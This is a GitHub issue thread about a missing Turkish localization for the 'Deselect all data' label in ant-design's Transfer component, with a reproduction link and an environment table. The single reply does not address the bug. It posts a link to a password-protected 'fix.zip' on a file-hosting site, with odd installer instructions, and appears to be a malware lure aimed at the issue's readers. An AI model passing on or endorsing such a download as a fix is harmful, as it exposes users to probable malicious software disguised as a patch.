### ISSUE TITLE
Transfer deselectAll localization key is missing

### ISSUE THREAD

**Issue by bertanyaman** [ant-design/ant-design#50608]
### Reproduction link

[![Edit on StackBlitz](https://developer.stackblitz.com/img/open_in_stackblitz.svg)](https://stackblitz.com/edit/antd-reproduce-5x-mwisnv)

### Steps to reproduce

Deselect all data

### What is expected?

"Deselect all data" label must be turkish

### What is actually happening?

"Deselect all data" label is english

| Environment | Info |
| --- | --- |
| antd | 5.20.3 |
| React | 18.2.0 |
| System | Windows 11 23H2 |
| Browser | Chrome |

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
